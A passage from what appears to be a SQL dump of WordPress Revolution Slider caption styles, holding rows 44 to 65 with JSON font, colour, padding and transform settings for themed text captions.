(44, '.tp-caption.small_light_white', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(45, '.tp-caption.roundedimage', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),
(46, '.tp-caption.large_bg_black', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":[],\"hover\":\"\"}', '{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(47, '.tp-caption.mediumwhitebg', '{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}', 'null', '{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}'),
(48, '.tp-caption.MarkerDisplay', '{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}', '{\"color\":\"#ff0000\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}', '{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"font-style\":\"normal\",\"font-family\":\"Permanent Marker\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(49, '.tp-caption.Restaurant-Display', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"font-size\":\"120px\",\"line-height\":\"120px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(50, '.tp-caption.Restaurant-Cursive', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Nothing you could do\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(51, '.tp-caption.Restaurant-ScrollDownText', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(52, '.tp-caption.Restaurant-Description', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}', '{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(53, '.tp-caption.Restaurant-Price', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}', '{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(54, '.tp-caption.Restaurant-Menuitem', '{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"Power2.easeInOut\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(55, '.tp-caption.Furniture-LogoText', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"160px\",\"line-height\":\"150px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(56, '.tp-caption.Furniture-Plus', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0.5\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"text-shadow\":\"none\",\"box-shadow\":\"rgba(0,0,0,0.1) 0 1px 3px\"},\"hover\":\"\"}', '{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"6px\",\"7px\",\"4px\",\"7px\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(57, '.tp-caption.Furniture-Title', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"3px\"},\"hover\":\"\"}', '{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(58, '.tp-caption.Furniture-Subtitle', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(59, '.tp-caption.Gym-Display', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(60, '.tp-caption.Gym-Subline', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(61, '.tp-caption.Gym-SmallText', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"22\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(62, '.tp-caption.Fashion-SmallText', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"20px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(63, '.tp-caption.Fashion-BigDisplay', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(64, '.tp-caption.Fashion-TextBlock', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"40px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(65, '.tp-caption.Sports-Display', '{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"13px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
